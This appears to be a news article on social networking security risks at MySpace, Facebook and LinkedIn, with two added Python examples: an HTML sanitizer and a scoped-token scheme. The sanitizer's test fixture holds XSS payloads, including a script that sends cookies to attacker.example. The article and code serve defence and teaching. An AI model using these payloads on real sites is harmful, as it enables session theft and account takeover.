
Experts: Security Flaws Vary on Social Networking Sites

Though often lumped together, MySpace, Facebook, and LinkedIn each have their own security weaknesses

You are more insulated from spam or worms on LinkedIn than you would be on MySpace -- but your organization may be more susceptible to a targeted attack via the business-oriented social networking site.

This is just one example of the differences in vulnerabilities found in the three most popular social networking sites: MySpace, Facebook, and LinkedIn. Although the three sites have previously been painted with a broad security brush, each carries its own unique risks, experts say. (See Social Networking Gone Bad.)

LinkedIn, which is based on a friend-to-friend-to-friend connection model, could provide a social engineer with a treasure trove of information, including corporate organization charts or email addresses that can lead to spear-phishing attacks.

"You can log onto LinkedIn without authentication and claim to be part of a group, and suddenly you have an organizational chart that is typically confidential information," says Tod Beardsley, lead counter-fraud engineer for TippingPoint. "So it lets you do a Kevin Mitnick-style attack, where you're inserting yourself into a position of trust... This makes the job of social engineering much easier."

LinkedIn's problem isn't so much technology as the common practice of sharing names, titles, and organizations. "It used to take someone a couple of weeks or a month to get an organizational chart for his attack. Now it's all online," he says.

Once an attacker finds out the names of who works with whom, for instance, he could send a carefully crafted email via LinkedIn to the victim's HR department head, posing as a headhunter recommending a candidate for an open position. But his email could carry a malicious Word file, rather than a resume. When opened, the file could gain ownership of the HR rep's PC and steal other company information, says Graham Cluley, senior technology consultant for Sophos.

"Information about how people are connected, the work they do, and their positions, is all gold dust to the committed identity thief or targeted attacker," Cluley says. "It gives them the stepping stones to commit identity theft" or other breaches, he says.

And because LinkedIn and other social networking sites let users authenticate to the site via an email address, they open up another potential hole for an attacker. "LinkedIn suffers from the same problem as a lot of other social networking sites -- they do a lot of authentication based on unauthenticated email," TippingPoint's Beardsley says. A user can click the "forgot my password" link to have a reset sent to the address on file, for instance, so whoever can read that mailbox can reset the password.

"The problem here is you're relying on email security as well as your social networking site security," he says. "Both have to work well."

But LinkedIn is generally safer than MySpace and Facebook, mainly because it's less feature-rich and thus opens fewer potential attack vectors, experts say.

MySpace was one of the first social networking sites, and it's still the largest, with over 200 million accounts worldwide. Its sheer size has made it an obvious target for spammers, hackers, and online predators.

Aside from the big bull's eye on its back, though, MySpace is also a victim of its own business model, where the user controls his or her content and presentation. Users can add banners to their pages, and embed other Web technologies and links: "There's lots of opportunities to link to dangerous things and to embed malware on those pages," Sophos's Cluley says.

MySpace is regularly pummeled with spam, and has had some cross-site scripting (XSS) flaws exposed, including one recently presented at Black Hat USA this summer. And one XSS bug on MySpace can go a long way for a spammer: "A nice cross-site scripting bug can compromise hundreds of thousands of browsers in an hour. It's super-useful for spammers, as well as people running botnets," TippingPoint's Beardsley says. (See Hackers Reveal Vulnerable Websites, Zero Day Flaw Found in MySpace and MySpace Under Siege.)
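The reason a profile page is such a productive XSS target is the one Beardsley gives later in this story: the user controls the entire style sheet, so script can ride in on event-handler attributes, on `javascript:` links (including ones padded with tabs or encoded so a naive filter misses them), or on CSS `url()` and `expression()` values, not just on a `<script>` tag. The following is an added illustration written for this article, not MySpace's own filtering code: a minimal allowlist sanitizer for user-supplied profile markup in Python, run over a constructed profile fragment that packs several of those vectors together. Tag and attribute allowlists and the permitted CSS properties are assumptions chosen for the example.

```python
"""Allowlist sanitizer for user-supplied profile HTML (added example, not site code).

Everything not explicitly allowed is dropped: unknown tags, every on* handler,
non-http(s) URLs, and any CSS declaration outside a short list of properties.
"""
import re
from html import escape
from html.parser import HTMLParser

# Assumed policy for the example: a few structural tags, a few attributes.
ALLOWED_TAGS = {"b", "i", "p", "br", "a", "img", "div", "span"}
ALLOWED_ATTRS = {
    "a": {"href", "title"},
    "img": {"src", "alt"},
    "div": {"style"},
    "span": {"style"},
    "p": {"style"},
}
VOID_TAGS = {"br", "img"}
# Only simple property:value pairs; url(), expression(), behavior:, -moz-binding:
# never match, so CSS-borne script is dropped along with the declaration.
SAFE_CSS_DECL = re.compile(
    r"^(color|background-color|font-size|font-weight|text-align)\s*:\s*[#\w\s%.-]+$", re.I
)


def safe_url(url):
    """Return the URL if it is plain http(s), else None.
    Control characters and whitespace are removed first, because browsers
    ignore them inside a scheme ("java\\tscript:" still runs)."""
    compact = re.sub(r"[\x00-\x20]", "", url)
    if not compact.lower().startswith(("http://", "https://")):
        return None
    return compact


def sanitize_style(style):
    """Keep only declarations matching the allowlist regex."""
    kept = [d.strip() for d in style.split(";") if SAFE_CSS_DECL.match(d.strip())]
    return "; ".join(kept)


class ProfileSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)  # entity-encoded values are decoded before checks
        self.out = []      # emitted HTML fragments
        self.open = []     # allowed tags currently open, to keep nesting valid
        self.skip = None   # set while inside <script>/<style>, whose text is discarded

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            if tag in ("script", "style"):
                self.skip = tag
            return  # unknown tag dropped, its text content kept
        clean = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops onmouseover=, onerror=, etc.
            value = value or ""
            if name in ("href", "src"):
                value = safe_url(value)
                if value is None:
                    continue
            elif name == "style":
                value = sanitize_style(value)
                if not value:
                    continue
            clean.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(clean)}>")
        if tag not in VOID_TAGS:
            self.open.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")
            self.open.pop()

    def handle_endtag(self, tag):
        if tag == self.skip:
            self.skip = None
            return
        if tag in self.open:
            while self.open:  # close anything left open inside it
                t = self.open.pop()
                self.out.append(f"</{t}>")
                if t == tag:
                    break

    def handle_data(self, data):
        if self.skip is None:
            self.out.append(escape(data))

    def close_all(self):
        while self.open:
            self.out.append(f"</{self.open.pop()}>")


def sanitize_profile(html):
    p = ProfileSanitizer()
    p.feed(html)
    p.close()
    p.close_all()
    return "".join(p.out)


# Constructed sample profile fragment: CSS url(), handler attribute, tab-split
# javascript: link, inline script, and an onerror image, all in one div.
SAMPLE_PROFILE = (
    '<div style="background:url(javascript:alert(1));color:red" onmouseover="alert(2)">'
    '<a href="java\tscript:alert(3)">click</a> '
    '<a href="http://example.com/">ok</a>'
    '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
    '<img src="x" onerror="alert(4)">'
    "</div>"
)

if __name__ == "__main__":
    print(sanitize_profile(SAMPLE_PROFILE))
```

Only `color:red`, the plain `http://` link and an attribute-less `<img>` survive; the `<script>` body is discarded rather than re-emitted as text. The parser also decodes entities before the URL and style checks run, which is where hand-rolled regex filters usually fail.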

Aside from the infamous Samy worm attack on MySpace in 2005, the site also has reportedly had trouble keeping some private data private: "MySpace had several problems with password-leaking, too... Apparently, they don't have a lot of control on particular user information," Beardsley says.

Facebook, meanwhile, is growing rapidly, with around 52 million users, and according to Sophos, Facebook-related traffic accounts for 30 percent of Internet traffic in some organizations. Unlike MySpace, it gives users a more cookie-cutter profile layout. "It's harder to craft a persistent attack on Facebook" because of that structure, Beardsley says.

"Part of the reason Facebook is so popular is that many users were put off by the anarchy of MySpace, and see Facebook as more controlled and conservative," Sophos' Cluley says. "But that's not to say Facebook is a 100 percent safe place." (See Facebook Gets a Little Too Social.)

As a matter of fact, Facebook's reliance on third-party applications has its tradeoffs as well. With these apps, the user is not only entrusting Facebook with his logon and password, but also must trust the third-party developers who provide tools for Facebook users. Beardsley says signing up for these apps often requires that the user provide his or her user name and password so that the third-party code can be added to his or her profile.

"There's no real way of determining if they kept that [data] forever, or if it's in an encrypted format," Beardsley says. "You're basically giving up your user name and password."

Cluley says Facebook doesn't actually approve the third-party apps -- he even wrote a Facebook app of his own. "There's the danger that the code you're running on the site there is malicious or could point you to a site that contains malware," he says.
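The practitioner's answer to both points above (an app that may keep your password forever, and no approval step before it runs) is to never give the app the password at all: the site issues the app a signed token that names the user, the app, a set of scopes and an expiry, and that the user can revoke. The block below is an added example written for this article, not Facebook's own application-authentication mechanism, which the story does not describe. The signing key, the scope names and the in-memory revocation set are assumptions for the example.

```python
"""Delegated, scoped, revocable app tokens instead of password sharing.
Added example; not the design of any site named in the article."""
import base64
import hashlib
import hmac
import json
import secrets
import time

SITE_SECRET = secrets.token_bytes(32)  # assumed: server-side HMAC key, never leaves the site
REVOKED = set()                        # assumed: token ids the user has revoked (a DB in practice)


def _b64(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(user_id, app_id, scopes, ttl_seconds=3600, now=None):
    """Mint a token the app presents instead of the user's credentials.
    It carries who, which app, what it may do and until when; the password is never in it."""
    now = int(time.time()) if now is None else now
    payload = {
        "jti": secrets.token_hex(8),   # unique id so a single token can be revoked
        "sub": user_id,
        "app": app_id,
        "scopes": sorted(scopes),
        "exp": now + ttl_seconds,
    }
    body = _b64(json.dumps(payload, separators=(",", ":")).encode())
    sig = _b64(hmac.new(SITE_SECRET, body.encode(), hashlib.sha256).digest())
    return f"{body}.{sig}"


def check_token(token, required_scope, now=None):
    """Return the payload if the token is authentic, unexpired, unrevoked and
    grants required_scope; otherwise None. Order matters: verify the MAC
    before trusting anything inside the body."""
    now = int(time.time()) if now is None else now
    try:
        body, sig = token.split(".", 1)
    except ValueError:
        return None
    expected = _b64(hmac.new(SITE_SECRET, body.encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(sig, expected):  # constant-time comparison
        return None
    payload = json.loads(_unb64(body))
    if payload["exp"] <= now or payload["jti"] in REVOKED:
        return None
    if required_scope not in payload["scopes"]:
        return None
    return payload


def revoke_token(token):
    """User-initiated revocation: the app keeps the string, but it stops working."""
    body = token.split(".", 1)[0]
    REVOKED.add(json.loads(_unb64(body))["jti"])


if __name__ == "__main__":
    # Constructed scenario: a "zombie bite" app gets read-only access for an hour.
    tok = issue_token("alice", "zombie-bite-app", ["read:profile"], now=1000)
    print(check_token(tok, "read:profile", now=1500))   # payload
    print(check_token(tok, "write:profile", now=1500))  # None: scope not granted
    revoke_token(tok)
    print(check_token(tok, "read:profile", now=1500))   # None: revoked
```

Even if an unvetted app stores this token "forever", it cannot read the user's password, cannot act outside the scopes it was granted, and stops working at expiry or the moment the user revokes it. The same signed, expiring, single-use construction is what a "forgot my password" link should carry, since that link is only as safe as the mailbox it lands in.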

There are some temptingly fun tools for Facebook, such as apps that let you virtually "bite" your friend and turn him into a zombie, throw croissants at him, or buy him a round of drinks. "The tools and content are getting richer, but there seems to be more control over [the content] in Facebook," Cluley says.

The simple rule of thumb for any social networking Website: Don't share any information unless it's absolutely necessary, security experts say. There's an app on Facebook that reveals what your porn-actor or pole-dancer name would be based on information you supply -- such as your mother's maiden name, and the name of your first pet.

"We know lots of email sites and online banking sites ask you to confirm these kinds of things when you get your password," which means that data could eventually be used to steal information from you, Cluley says.

Still, 87 percent of Facebook users recently surveyed by Sophos admitted to providing education and work details in their profiles. Seventy-eight percent have provided their current address or location. The study also found that nearly half of companies are now blocking access to the social networking site for productivity reasons, as well as security concerns.

Another way social networking users can protect themselves is to avoid clicking on links within a profile. "For starters, I don't click on anything... on MySpace," Beardsley says. "The user controls the entire style sheet, so you can't trust anything."

And be selective about who can view your profile. "'Link in' only with people you are certain are your friends," Cluley says. "If someone who says they want to link in with me isn't someone I'd ever invite for dinner, I may feel awkward about rejecting them," but it's better to be safe than to worry about hurting someone's feelings, he says.

As for social networking at work, businesses need to step up and set their policy on visiting these sites during work hours, experts say. "They have NDAs in blogs, but their users are giving up secrets" on MySpace, Beardsley says.
